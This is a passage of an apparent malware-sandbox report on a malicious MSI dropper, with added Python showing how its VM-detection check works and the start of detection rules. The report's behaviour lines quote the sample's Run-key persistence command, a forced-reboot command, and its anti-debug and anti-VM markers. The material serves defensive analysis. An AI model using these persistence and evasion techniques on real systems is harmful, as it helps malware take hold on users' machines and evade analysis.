Source: C:\Windows\SysWOW64\msiexec.exe | File created: C:\Users\Public\PeFI\vJrY\WebView2Loader.dll (copy)
Source: C:\Windows\System32\msiexec.exe | File created: C:\Windows\Installer\MSI7003.tmp
Source: C:\Windows\System32\msiexec.exe | File created: C:\Windows\Installer\MSI6F47.tmp
Source: C:\Windows\System32\msiexec.exe | File created: C:\Windows\Installer\MSI7033.tmp
Source: C:\Windows\System32\msiexec.exe | File created: C:\Windows\Installer\MSI62DE.tmp
Source: C:\Windows\System32\msiexec.exe | File created: C:\Windows\Installer\MSI9F25.tmp
Source: C:\Windows\System32\msiexec.exe | File created: C:\Windows\Installer\MSI6185.tmp
Source: C:\Windows\System32\msiexec.exe | File created: C:\Windows\Installer\MSI635C.tmp
Source: C:\Windows\System32\msiexec.exe | File created: C:\Windows\Installer\MSI6F17.tmp
Source: C:\Windows\System32\msiexec.exe | File created: C:\Windows\Installer\MSI6467.tmp
Source: C:\Windows\System32\msiexec.exe | File created: C:\Windows\Installer\MSI6487.tmp
Source: C:\Windows\SysWOW64\msiexec.exe | File created: C:\Users\Public\PeFI\vJrY\PeFI.png
Source: C:\Windows\SysWOW64\msiexec.exe | File created: C:\Users\Public\PeFI\vJrY.png
Source: C:\Windows\SysWOW64\reg.exe | Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run PeFIvJrY (2 entries)
Source: C:\Users\Public\PeFI\vJrY\PeFIvJrY.exe | Code function: 12_2_0042536C GetModuleHandleW,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,12_2_0042536C
Source: C:\Windows\System32\msiexec.exe | Process information set: NOOPENFILEERRORBOX (14 entries)
Source: C:\Windows\SysWOW64\msiexec.exe | Process information set: NOOPENFILEERRORBOX (4 entries)
Source: C:\Users\Public\PeFI\vJrY\PeFIvJrY.exe | Process information set: NOOPENFILEERRORBOX (47 entries)
Source: C:\Users\Public\PeFI\vJrY\PeFIvJrY.exe | Memory allocated: 25B0000 memory reserve | memory write watch
Source: C:\Users\Public\PeFI\vJrY\PeFIvJrY.exe | Memory allocated: 3240000 memory reserve | memory write watch
Source: C:\Users\Public\PeFI\vJrY\PeFIvJrY.exe | Memory allocated: 5240000 memory reserve | memory write watch
Source: C:\Users\Public\PeFI\vJrY\PeFIvJrY.exe | Code function: 12_2_0040CB80 NtQuerySystemInformation,NtQuerySystemInformation,SysAllocStringLen,GetCurrentProcessId,GetLastError,NtQueryInformationProcess,NtQueryInformationProcess,CloseHandle,12_2_0040CB80
Source: C:\Users\Public\PeFI\vJrY\PeFIvJrY.exe | Thread delayed: delay time: 922337203685477
Source: C:\Users\Public\PeFI\vJrY\PeFIvJrY.exe | Thread delayed: delay time: 600000
Source: C:\Users\Public\PeFI\vJrY\PeFIvJrY.exe | Thread delayed: delay time: 599875
Source: C:\Users\Public\PeFI\vJrY\PeFIvJrY.exe | Thread delayed: delay time: 599766
Source: C:\Users\Public\PeFI\vJrY\PeFIvJrY.exe | Thread delayed: delay time: 599656
Source: C:\Users\Public\PeFI\vJrY\PeFIvJrY.exe | Thread delayed: delay time: 599547
Source: C:\Users\Public\PeFI\vJrY\PeFIvJrY.exe | Thread delayed: delay time: 599438
Source: C:\Users\Public\PeFI\vJrY\PeFIvJrY.exe | Thread delayed: delay time: 599313
Source: C:\Users\Public\PeFI\vJrY\PeFIvJrY.exe | Thread delayed: delay time: 599188
Source: C:\Users\Public\PeFI\vJrY\PeFIvJrY.exe | Thread delayed: delay time: 599063
Source: C:\Users\Public\PeFI\vJrY\PeFIvJrY.exe | Thread delayed: delay time: 598952
Source: C:\Users\Public\PeFI\vJrY\PeFIvJrY.exe | Thread delayed: delay time: 598724
Source: C:\Users\Public\PeFI\vJrY\PeFIvJrY.exe | Thread delayed: delay time: 598594
Source: C:\Users\Public\PeFI\vJrY\PeFIvJrY.exe | Thread delayed: delay time: 598484
Source: C:\Users\Public\PeFI\vJrY\PeFIvJrY.exe | Thread delayed: delay time: 598375
Source: C:\Users\Public\PeFI\vJrY\PeFIvJrY.exe | Thread delayed: delay time: 598266
Source: C:\Users\Public\PeFI\vJrY\PeFIvJrY.exe | Thread delayed: delay time: 598156
Source: C:\Users\Public\PeFI\vJrY\PeFIvJrY.exe | Thread delayed: delay time: 598047
Source: C:\Users\Public\PeFI\vJrY\PeFIvJrY.exe | Thread delayed: delay time: 597938
Source: C:\Users\Public\PeFI\vJrY\PeFIvJrY.exe | Thread delayed: delay time: 597813
Source: C:\Users\Public\PeFI\vJrY\PeFIvJrY.exe | Thread delayed: delay time: 597703
Source: C:\Users\Public\PeFI\vJrY\PeFIvJrY.exe | Thread delayed: delay time: 597594
Source: C:\Users\Public\PeFI\vJrY\PeFIvJrY.exe | Thread delayed: delay time: 597469
Source: C:\Users\Public\PeFI\vJrY\PeFIvJrY.exe | Thread delayed: delay time: 597359
Source: C:\Users\Public\PeFI\vJrY\PeFIvJrY.exe | Thread delayed: delay time: 597250
Source: C:\Users\Public\PeFI\vJrY\PeFIvJrY.exe | Thread delayed: delay time: 597141
Source: C:\Users\Public\PeFI\vJrY\PeFIvJrY.exe | Thread delayed: delay time: 597031
Source: C:\Users\Public\PeFI\vJrY\PeFIvJrY.exe | Thread delayed: delay time: 596922
Source: C:\Users\Public\PeFI\vJrY\PeFIvJrY.exe | Thread delayed: delay time: 596813
Source: C:\Users\Public\PeFI\vJrY\PeFIvJrY.exe | Thread delayed: delay time: 596688
Source: C:\Users\Public\PeFI\vJrY\PeFIvJrY.exe | Thread delayed: delay time: 596578
Source: C:\Users\Public\PeFI\vJrY\PeFIvJrY.exe | Thread delayed: delay time: 596469
Source: C:\Users\Public\PeFI\vJrY\PeFIvJrY.exe | Thread delayed: delay time: 596344
Source: C:\Users\Public\PeFI\vJrY\PeFIvJrY.exe | Thread delayed: delay time: 596234
Source: C:\Users\Public\PeFI\vJrY\PeFIvJrY.exe | Thread delayed: delay time: 596125
Source: C:\Users\Public\PeFI\vJrY\PeFIvJrY.exe | Window / User API: threadDelayed 1627
Source: C:\Users\Public\PeFI\vJrY\PeFIvJrY.exe | Window / User API: threadDelayed 8199
Source: C:\Windows\System32\msiexec.exe | Dropped PE file which has not been started: C:\Windows\Installer\MSI7003.tmp
Source: C:\Windows\System32\msiexec.exe | Dropped PE file which has not been started: C:\Windows\Installer\MSI6F47.tmp
Source: C:\Windows\System32\msiexec.exe | Dropped PE file which has not been started: C:\Windows\Installer\MSI7033.tmp
Source: C:\Windows\SysWOW64\msiexec.exe | Dropped PE file which has not been started: C:\Users\Public\PeFI\vJrY\PeFI.png
Source: C:\Windows\System32\msiexec.exe | Dropped PE file which has not been started: C:\Windows\Installer\MSI62DE.tmp
Source: C:\Windows\System32\msiexec.exe | Dropped PE file which has not been started: C:\Windows\Installer\MSI9F25.tmp
Source: C:\Windows\System32\msiexec.exe | Dropped PE file which has not been started: C:\Windows\Installer\MSI6185.tmp
Source: C:\Windows\SysWOW64\msiexec.exe | Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\shi6530.tmp
Source: C:\Windows\SysWOW64\msiexec.exe | Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\shi64B2.tmp
Source: C:\Windows\System32\msiexec.exe | Dropped PE file which has not been started: C:\Windows\Installer\MSI635C.tmp
Source: C:\Windows\System32\msiexec.exe | Dropped PE file which has not been started: C:\Windows\Installer\MSI6F17.tmp
Source: C:\Windows\System32\msiexec.exe | Dropped PE file which has not been started: C:\Windows\Installer\MSI6467.tmp
Source: C:\Windows\System32\msiexec.exe | Dropped PE file which has not been started: C:\Windows\Installer\MSI6487.tmp
Source: C:\Users\Public\PeFI\vJrY\PeFIvJrY.exe | API coverage: 9.0 %
Source: C:\Windows\SysWOW64\msiexec.exe TID: 7208 | Thread sleep time: -30000s >= -30000s
Source: C:\Users\Public\PeFI\vJrY\PeFIvJrY.exe TID: 7944 | Thread sleep time: -32281802128991695s >= -30000s
Source: C:\Users\Public\PeFI\vJrY\PeFIvJrY.exe TID: 7944 | Thread sleep time: -600000s >= -30000s
Source: C:\Users\Public\PeFI\vJrY\PeFIvJrY.exe TID: 7944 | Thread sleep time: -599875s >= -30000s
Source: C:\Users\Public\PeFI\vJrY\PeFIvJrY.exe TID: 7944 | Thread sleep time: -599766s >= -30000s
Source: C:\Users\Public\PeFI\vJrY\PeFIvJrY.exe TID: 7944 | Thread sleep time: -599656s >= -30000s
Source: C:\Users\Public\PeFI\vJrY\PeFIvJrY.exe TID: 7944 | Thread sleep time: -599547s >= -30000s
Source: C:\Users\Public\PeFI\vJrY\PeFIvJrY.exe TID: 7944 | Thread sleep time: -599438s >= -30000s
Source: C:\Users\Public\PeFI\vJrY\PeFIvJrY.exe TID: 7944 | Thread sleep time: -599313s >= -30000s
Source: C:\Users\Public\PeFI\vJrY\PeFIvJrY.exe TID: 7944 | Thread sleep time: -599188s >= -30000s
Source: C:\Users\Public\PeFI\vJrY\PeFIvJrY.exe TID: 7944 | Thread sleep time: -599063s >= -30000s
Source: C:\Users\Public\PeFI\vJrY\PeFIvJrY.exe TID: 7944 | Thread sleep time: -598952s >= -30000s
Source: C:\Users\Public\PeFI\vJrY\PeFIvJrY.exe TID: 7944 | Thread sleep time: -598724s >= -30000s
Source: C:\Users\Public\PeFI\vJrY\PeFIvJrY.exe TID: 7944 | Thread sleep time: -598594s >= -30000s
Source: C:\Users\Public\PeFI\vJrY\PeFIvJrY.exe TID: 7944 | Thread sleep time: -598484s >= -30000s
Source: C:\Users\Public\PeFI\vJrY\PeFIvJrY.exe TID: 7944 | Thread sleep time: -598375s >= -30000s
Source: C:\Users\Public\PeFI\vJrY\PeFIvJrY.exe TID: 7944 | Thread sleep time: -598266s >= -30000s
Source: C:\Users\Public\PeFI\vJrY\PeFIvJrY.exe TID: 7944 | Thread sleep time: -598156s >= -30000s
Source: C:\Users\Public\PeFI\vJrY\PeFIvJrY.exe TID: 7944 | Thread sleep time: -598047s >= -30000s
Source: C:\Users\Public\PeFI\vJrY\PeFIvJrY.exe TID: 7944 | Thread sleep time: -597938s >= -30000s
Source: C:\Users\Public\PeFI\vJrY\PeFIvJrY.exe TID: 7944 | Thread sleep time: -597813s >= -30000s
Source: C:\Users\Public\PeFI\vJrY\PeFIvJrY.exe TID: 7944 | Thread sleep time: -597703s >= -30000s
Source: C:\Users\Public\PeFI\vJrY\PeFIvJrY.exe TID: 7944 | Thread sleep time: -597594s >= -30000s
Source: C:\Users\Public\PeFI\vJrY\PeFIvJrY.exe TID: 7944 | Thread sleep time: -597469s >= -30000s
Source: C:\Users\Public\PeFI\vJrY\PeFIvJrY.exe TID: 7944 | Thread sleep time: -597359s >= -30000s
Source: C:\Users\Public\PeFI\vJrY\PeFIvJrY.exe TID: 7944 | Thread sleep time: -597250s >= -30000s
Source: C:\Users\Public\PeFI\vJrY\PeFIvJrY.exe TID: 7944 | Thread sleep time: -597141s >= -30000s
Source: C:\Users\Public\PeFI\vJrY\PeFIvJrY.exe TID: 7944 | Thread sleep time: -597031s >= -30000s
Source: C:\Users\Public\PeFI\vJrY\PeFIvJrY.exe TID: 7944 | Thread sleep time: -596922s >= -30000s
Source: C:\Users\Public\PeFI\vJrY\PeFIvJrY.exe TID: 7944 | Thread sleep time: -596813s >= -30000s
Source: C:\Users\Public\PeFI\vJrY\PeFIvJrY.exe TID: 7944 | Thread sleep time: -596688s >= -30000s
Source: C:\Users\Public\PeFI\vJrY\PeFIvJrY.exe TID: 7944 | Thread sleep time: -596578s >= -30000s
Source: C:\Users\Public\PeFI\vJrY\PeFIvJrY.exe TID: 7944 | Thread sleep time: -596469s >= -30000s
Source: C:\Users\Public\PeFI\vJrY\PeFIvJrY.exe TID: 7944 | Thread sleep time: -596344s >= -30000s
Source: C:\Users\Public\PeFI\vJrY\PeFIvJrY.exe TID: 7944 | Thread sleep time: -596234s >= -30000s
Source: C:\Users\Public\PeFI\vJrY\PeFIvJrY.exe TID: 7944 | Thread sleep time: -596125s >= -30000s
Source: C:\Windows\SysWOW64\msiexec.exe | WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_BIOS
Source: C:\Windows\SysWOW64\msiexec.exe | WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_ComputerSystem
Source: C:\Windows\System32\conhost.exe | Last function: Thread delayed (3 entries)
Source: C:\Windows\System32\msiexec.exe | File Volume queried: C:\ FullSizeInformation (7 entries)
Source: C:\Users\Public\PeFI\vJrY\PeFIvJrY.exeCode function: 12_2_0043303C FindFirstFileExW,12_2_0043303C
Source: C:\Users\Public\PeFI\vJrY\PeFIvJrY.exeCode function: 12_2_00424DC6 FindFirstFileExW,GetLastError,FindFirstFileExW,GetLastError,12_2_00424DC6
Source: C:\Users\Public\PeFI\vJrY\PeFIvJrY.exeCode function: 12_2_00424DA6 FindClose,FindFirstFileExW,GetLastError,FindFirstFileExW,GetLastError,12_2_00424DA6
Source: C:\Users\Public\PeFI\vJrY\PeFIvJrY.exeCode function: 12_2_004231FD VirtualQuery,GetSystemInfo,12_2_004231FD
Source: C:\Users\Public\PeFI\vJrY\PeFIvJrY.exeThread delayed: delay time: 922337203685477Jump to behavior
Source: C:\Users\Public\PeFI\vJrY\PeFIvJrY.exeThread delayed: delay time: 600000Jump to behavior
Source: C:\Users\Public\PeFI\vJrY\PeFIvJrY.exeThread delayed: delay time: 599875Jump to behavior
Source: C:\Users\Public\PeFI\vJrY\PeFIvJrY.exeThread delayed: delay time: 599766Jump to behavior
Source: C:\Users\Public\PeFI\vJrY\PeFIvJrY.exeThread delayed: delay time: 599656Jump to behavior
Source: C:\Users\Public\PeFI\vJrY\PeFIvJrY.exeThread delayed: delay time: 599547Jump to behavior
Source: C:\Users\Public\PeFI\vJrY\PeFIvJrY.exeThread delayed: delay time: 599438Jump to behavior
Source: C:\Users\Public\PeFI\vJrY\PeFIvJrY.exeThread delayed: delay time: 599313Jump to behavior
Source: C:\Users\Public\PeFI\vJrY\PeFIvJrY.exeThread delayed: delay time: 599188Jump to behavior
Source: C:\Users\Public\PeFI\vJrY\PeFIvJrY.exeThread delayed: delay time: 599063Jump to behavior
Source: C:\Users\Public\PeFI\vJrY\PeFIvJrY.exeThread delayed: delay time: 598952Jump to behavior
Source: C:\Users\Public\PeFI\vJrY\PeFIvJrY.exeThread delayed: delay time: 598724Jump to behavior
Source: C:\Users\Public\PeFI\vJrY\PeFIvJrY.exeThread delayed: delay time: 598594Jump to behavior
Source: C:\Users\Public\PeFI\vJrY\PeFIvJrY.exeThread delayed: delay time: 598484Jump to behavior
Source: C:\Users\Public\PeFI\vJrY\PeFIvJrY.exeThread delayed: delay time: 598375Jump to behavior
Source: C:\Users\Public\PeFI\vJrY\PeFIvJrY.exeThread delayed: delay time: 598266Jump to behavior
Source: C:\Users\Public\PeFI\vJrY\PeFIvJrY.exeThread delayed: delay time: 598156Jump to behavior
Source: C:\Users\Public\PeFI\vJrY\PeFIvJrY.exeThread delayed: delay time: 598047Jump to behavior
Source: C:\Users\Public\PeFI\vJrY\PeFIvJrY.exeThread delayed: delay time: 597938Jump to behavior
Source: C:\Users\Public\PeFI\vJrY\PeFIvJrY.exeThread delayed: delay time: 597813Jump to behavior
Source: C:\Users\Public\PeFI\vJrY\PeFIvJrY.exeThread delayed: delay time: 597703Jump to behavior
Source: C:\Users\Public\PeFI\vJrY\PeFIvJrY.exeThread delayed: delay time: 597594Jump to behavior
Source: C:\Users\Public\PeFI\vJrY\PeFIvJrY.exeThread delayed: delay time: 597469Jump to behavior
Source: C:\Users\Public\PeFI\vJrY\PeFIvJrY.exeThread delayed: delay time: 597359Jump to behavior
Source: C:\Users\Public\PeFI\vJrY\PeFIvJrY.exeThread delayed: delay time: 597250Jump to behavior
Source: C:\Users\Public\PeFI\vJrY\PeFIvJrY.exeThread delayed: delay time: 597141Jump to behavior
Source: C:\Users\Public\PeFI\vJrY\PeFIvJrY.exeThread delayed: delay time: 597031Jump to behavior
Source: C:\Users\Public\PeFI\vJrY\PeFIvJrY.exeThread delayed: delay time: 596922Jump to behavior
Source: C:\Users\Public\PeFI\vJrY\PeFIvJrY.exeThread delayed: delay time: 596813Jump to behavior
Source: C:\Users\Public\PeFI\vJrY\PeFIvJrY.exeThread delayed: delay time: 596688Jump to behavior
Source: C:\Users\Public\PeFI\vJrY\PeFIvJrY.exeThread delayed: delay time: 596578Jump to behavior
Source: C:\Users\Public\PeFI\vJrY\PeFIvJrY.exeThread delayed: delay time: 596469Jump to behavior
Source: C:\Users\Public\PeFI\vJrY\PeFIvJrY.exeThread delayed: delay time: 596344Jump to behavior
Source: C:\Users\Public\PeFI\vJrY\PeFIvJrY.exeThread delayed: delay time: 596234Jump to behavior
Source: C:\Users\Public\PeFI\vJrY\PeFIvJrY.exeThread delayed: delay time: 596125Jump to behavior
Source: PeFIvJrY.exe, 0000000C.00000002.3849220507.00000000054E4000.00000002.00000001.01000000.00000005.sdmp, PeFIvJrY.exe, 0000000D.00000002.1729149617.000000006D564000.00000002.00000001.01000000.00000005.sdmp, PeFI.png.3.drBinary or memory string: HPC Edition7HPC Edition without Hyper-V
Source: PeFIvJrY.exe, 0000000C.00000002.3849220507.00000000054E4000.00000002.00000001.01000000.00000005.sdmp, PeFIvJrY.exe, 0000000D.00000002.1729149617.000000006D564000.00000002.00000001.01000000.00000005.sdmp, PeFI.png.3.drBinary or memory string: Single LanguagesWindows Small Business Server Premium (core installation)5Server for SB Solutions EM3Enterprise Storage Server1Solution Embedded Server1Microsoft Hyper-V Server
Source: PeFIvJrY.exe, 0000000C.00000002.3849220507.00000000054E4000.00000002.00000001.01000000.00000005.sdmp, PeFIvJrY.exe, 0000000D.00000002.1729149617.000000006D564000.00000002.00000001.01000000.00000005.sdmp, PeFI.png.3.drBinary or memory string: Unknown productkEnterprise Server without Hyper-V (core installation)
Source: PeFIvJrY.exe, 0000000C.00000002.3849220507.00000000054E4000.00000002.00000001.01000000.00000005.sdmp, PeFIvJrY.exe, 0000000D.00000002.1729149617.000000006D564000.00000002.00000001.01000000.00000005.sdmp, PeFI.png.3.drBinary or memory string: Advanced ServereWindows Essential Server Solutions without Hyper-V
Source: PeFIvJrY.exe, 0000000C.00000002.3849220507.00000000054E4000.00000002.00000001.01000000.00000005.sdmp, PeFIvJrY.exe, 0000000D.00000002.1729149617.000000006D564000.00000002.00000001.01000000.00000005.sdmp, PeFI.png.3.drBinary or memory string: AtivoYFRviEC0n/N4+2AwLUvqsG68H4biL3/f1MGMfyvTFpzc=YwiRuB1adGDdROivLAf5L7N/vPu2LM0g/HsqQXZQJFEc=CEssential Business Server ADDLSVCWServer Enterprise (evaluation installation)kDatacenter Server without Hyper-V (core installation)
Source: PeFIvJrY.exe, 0000000C.00000003.3034144504.0000000000A43000.00000004.00000020.00020000.00000000.sdmp, PeFIvJrY.exe, 0000000C.00000003.3380949220.0000000000A43000.00000004.00000020.00020000.00000000.sdmp, PeFIvJrY.exe, 0000000C.00000002.3836856328.0000000000A43000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dlli
Source: PeFIvJrY.exe, 0000000C.00000002.3849220507.00000000054E4000.00000002.00000001.01000000.00000005.sdmp, PeFIvJrY.exe, 0000000D.00000002.1729149617.000000006D564000.00000002.00000001.01000000.00000005.sdmp, PeFI.png.3.dr | Binary or memory string: WorkstationgStandard Server without Hyper-V (core installation)
Source: PeFIvJrY.exe, 0000000C.00000002.3849220507.00000000054E4000.00000002.00000001.01000000.00000005.sdmp, PeFIvJrY.exe, 0000000D.00000002.1729149617.000000006D564000.00000002.00000001.01000000.00000005.sdmp, PeFI.png.3.dr | Binary or memory string: Ultimate[Enterprise Storage Server (core installation)7PRODUCT_EMBEDDED_INDUSTRY_E-Express Storage ServerUExpress Storage Server (core installation)cStorage Server Standard (evaluation installation)+SB Solution Server EMCDatacenter Server without Hyper-V
Source: PeFIvJrY.exe, 0000000C.00000002.3849220507.00000000054E4000.00000002.00000001.01000000.00000005.sdmp, PeFIvJrY.exe, 0000000D.00000002.1729149617.000000006D564000.00000002.00000001.01000000.00000005.sdmp, PeFI.png.3.dr | Binary or memory string: CEnterprise Server without Hyper-V
Source: 495fa1.msi.2.dr | Binary or memory string: 01234567890.0.0.0.%dVMware, Inc.VMware Virtual PlatformVMware7,1innotek GmbHVirtualBoxMicrosoft CorporationVirtual MachineVRTUALACRSYSA M IROOT\CIMV2SELECT * FROM Win32_ComputerSystemSELECT * FROM Win32_BIOSManufacturerModelVersionGetting system informationManufacturer [Model [BIOS [IsWow64Processkernel32Software\Microsoft\Windows NT\CurrentVersionSYSTEM\CurrentControlSet\Control\ProductOptionsCurrentMajorVersionNumberCurrentMinorVersionNumberCurrentVersionCurrentBuildNumberReleaseIdCSDVersionProductTypeProductSuiteWinNTServerNTSmall BusinessEnterpriseBackOfficeCommunicationServerTerminal ServerSmall Business(Restricted)EmbeddedNTDataCenterPersonalBladeEmbedded(Restricted)Security ApplianceStorage ServerCompute Server Failed to create IWbemLocator object. Error code: \\Could not connect to WMI provider. Error code: Failed to initialize security. Error code: Could not set proxy blanket. Error code: WQLWMI Query failed: []. Error code:
Source: PeFIvJrY.exe, 0000000C.00000002.3849220507.00000000054E4000.00000002.00000001.01000000.00000005.sdmp, PeFIvJrY.exe, 0000000D.00000002.1729149617.000000006D564000.00000002.00000001.01000000.00000005.sdmp, PeFI.png.3.dr | Binary or memory string: Ultimate E?Standard Server without Hyper-V
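The strings recovered from 495fa1.msi above (WMI queries on Win32_ComputerSystem and Win32_BIOS sitting next to VMware, VirtualBox and Hyper-V identifiers) have the usual shape of a virtual-machine fingerprint check. The block below is an added example, not code from the sample or from Joe Sandbox, that reproduces such a check over constructed host identities so that a sandbox operator can see which SMBIOS/WMI fields would trip it. The matching rule (case-insensitive substring comparison of each marker against the Manufacturer, Model and BIOS fields) and the grouping of markers by product are assumptions drawn from the strings; the page shows the strings, not the sample's comparison code, and the markers ACRSYS and A M I are left unattributed.

```python
from dataclasses import dataclass

# Marker strings present in 495fa1.msi, grouped by the product they usually
# identify. The grouping is an assumption; "ACRSYS" and "A M I" are also in the
# MSI but the page does not say what environment they are meant to catch.
VM_MARKERS = {
    "VMware": ("VMware, Inc.", "VMware Virtual Platform", "VMware7,1"),
    "VirtualBox": ("innotek GmbH", "VirtualBox"),
    "Hyper-V": ("Microsoft Corporation", "Virtual Machine", "VRTUAL"),
    "unattributed": ("ACRSYS", "A M I"),
}


@dataclass(frozen=True)
class HostIdentity:
    """The four values the MSI's WMI queries would return (Manufacturer/Model
    from Win32_ComputerSystem, Manufacturer/Version from Win32_BIOS)."""
    cs_manufacturer: str
    cs_model: str
    bios_manufacturer: str
    bios_version: str

    def fields(self):
        return {
            "Win32_ComputerSystem.Manufacturer": self.cs_manufacturer,
            "Win32_ComputerSystem.Model": self.cs_model,
            "Win32_BIOS.Manufacturer": self.bios_manufacturer,
            "Win32_BIOS.Version": self.bios_version,
        }


def vm_markers_hit(host):
    """Return (product, marker, field) for every marker found as a
    case-insensitive substring of any field. Assumed matching rule."""
    hits = []
    for product, markers in VM_MARKERS.items():
        for marker in markers:
            for field_name, value in host.fields().items():
                if marker.lower() in value.lower():
                    hits.append((product, marker, field_name))
    return hits


def looks_like_vm(host):
    """The decision a sample using these strings would most plausibly take."""
    return bool(vm_markers_hit(host))


# Constructed identities (not taken from the report): a stock VMware guest, the
# same guest with its SMBIOS strings rewritten, and a physical Surface device.
SANDBOX_DEFAULT = HostIdentity("VMware, Inc.", "VMware Virtual Platform",
                               "Phoenix Technologies LTD", "6.00")
SANDBOX_HARDENED = HostIdentity("Dell Inc.", "OptiPlex 7010", "Dell Inc.", "A29")
PHYSICAL_SURFACE = HostIdentity("Microsoft Corporation", "Surface Pro 9",
                                "Microsoft Corporation", "27.101.143")

if __name__ == "__main__":
    for name, host in [("default", SANDBOX_DEFAULT),
                       ("hardened", SANDBOX_HARDENED),
                       ("surface", PHYSICAL_SURFACE)]:
        print(name, looks_like_vm(host), vm_markers_hit(host))
```

On a Windows host the four fields can be read with Get-CimInstance Win32_ComputerSystem and Get-CimInstance Win32_BIOS and passed into HostIdentity. The stock VMware guest trips the check on Manufacturer and Model alone, which is why rewriting those SMBIOS strings (VMware exposes SMBIOS.reflectHost for this) is the first hardening step; the Surface identity shows the cost of the "Microsoft Corporation" marker on the other side, since a sample that matches it by itself also refuses to run on physical Microsoft hardware.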
Source: C:\Windows\System32\msiexec.exe | Process information queried: ProcessInformation
Source: C:\Users\Public\PeFI\vJrY\PeFIvJrY.exe | Code function: 12_2_00426602 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter
Source: C:\Users\Public\PeFI\vJrY\PeFIvJrY.exe | Code function: 12_2_0040CB80 NtQuerySystemInformation,NtQuerySystemInformation,SysAllocStringLen,GetCurrentProcessId,GetLastError,NtQueryInformationProcess,NtQueryInformationProcess,CloseHandle
Source: C:\Users\Public\PeFI\vJrY\PeFIvJrY.exe | Code function: 12_2_004318C6 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\Public\PeFI\vJrY\PeFIvJrY.exe | Code function: 12_2_00431882 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\Public\PeFI\vJrY\PeFIvJrY.exe | Code function: 12_2_0042EC45 mov ecx, dword ptr fs:[00000030h]
Source: C:\Users\Public\PeFI\vJrY\PeFIvJrY.exe | Code function: 12_2_003E40C0 GetProcessHeap,RtlAllocateHeap,GetProcessHeap,GetProcessHeap,HeapFree
Source: C:\Users\Public\PeFI\vJrY\PeFIvJrY.exe | Code function: 12_2_00426602 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter
Source: C:\Users\Public\PeFI\vJrY\PeFIvJrY.exe | Code function: 12_2_00426796 SetUnhandledExceptionFilter
Source: C:\Users\Public\PeFI\vJrY\PeFIvJrY.exe | Code function: 12_2_004259D6 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess
Source: C:\Users\Public\PeFI\vJrY\PeFIvJrY.exe | Code function: 12_2_00428FA3 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter
Source: C:\Users\Public\PeFI\vJrY\PeFIvJrY.exe | Memory allocated: page read and write + page guard
Source: C:\Windows\SysWOW64\msiexec.exe | Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /C start /MIN reg add HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run /v PeFIvJrY /t reg_sz /d "C:\Users\Public\PeFI\vJrY\PeFIvJrY.exe"
Source: C:\Windows\SysWOW64\msiexec.exe | Process created: C:\Windows\SysWOW64\shutdown.exe "C:\Windows\SysWOW64\shutdown.exe" /r /f /t 15
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\reg.exe reg add HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run /v PeFIvJrY /t reg_sz /d "C:\Users\Public\PeFI\vJrY\PeFIvJrY.exe"
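The chain recorded in the three "Process created" lines above (the SysWOW64 msiexec.exe spawning cmd.exe, which wraps a reg add into HKCU\...\CurrentVersion\Run pointing at a binary under C:\Users\Public, and the same msiexec.exe spawning shutdown.exe /r /f /t 15) is what the Sigma rules named in the overview fire on. The block below is an added example, not from Joe Sandbox or from the sample, of the same three checks written as rules over process-creation events. The events are constructed from the command lines on this page plus one benign control; the lists of user-writable path patterns and non-interactive parent images are tuning assumptions, not values taken from the report.

```python
import os
import re
from dataclasses import dataclass


@dataclass(frozen=True)
class ProcEvent:
    """Minimal process-creation record (Sysmon event 1 / EDR equivalent)."""
    image: str
    command_line: str
    parent_image: str


# Constructed events modelled on the chain in this report, plus a benign
# Run-key write for a Program Files binary as a control.
SAMPLE_EVENTS = [
    ProcEvent(r"C:\Windows\SysWOW64\cmd.exe",
              r'"C:\Windows\System32\cmd.exe" /C start /MIN reg add HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run /v PeFIvJrY /t reg_sz /d "C:\Users\Public\PeFI\vJrY\PeFIvJrY.exe"',
              r"C:\Windows\SysWOW64\msiexec.exe"),
    ProcEvent(r"C:\Windows\SysWOW64\reg.exe",
              r'reg add HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run /v PeFIvJrY /t reg_sz /d "C:\Users\Public\PeFI\vJrY\PeFIvJrY.exe"',
              r"C:\Windows\SysWOW64\cmd.exe"),
    ProcEvent(r"C:\Windows\SysWOW64\shutdown.exe",
              r'"C:\Windows\SysWOW64\shutdown.exe" /r /f /t 15',
              r"C:\Windows\SysWOW64\msiexec.exe"),
    ProcEvent(r"C:\Windows\System32\reg.exe",
              r'reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Run /v OneDrive /t REG_SZ /d "C:\Program Files\Microsoft OneDrive\OneDrive.exe"',
              r"C:\Windows\System32\cmd.exe"),
]

# Tuning assumptions (not from the report).
USER_WRITABLE_PREFIXES = ("c:\\users\\public\\", "c:\\programdata\\")
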